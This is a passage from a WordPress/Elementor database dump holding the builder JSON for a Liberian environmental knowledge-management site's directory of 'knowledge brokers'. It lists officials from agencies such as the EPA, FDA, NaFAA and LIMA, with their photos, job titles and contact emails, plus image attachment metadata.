image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24017,3520,'_wp_attached_file','2021/02/nafaa.png'),(24018,3520,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:17:\"2021/02/nafaa.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"nafaa-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"nafaa-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24019,3521,'_elementor_edit_mode','builder'),(24020,3521,'_elementor_template_type','wp-page'),(24021,3521,'_elementor_version','3.0.16'),(24022,3521,'_wp_page_template','default'),(24023,3521,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact 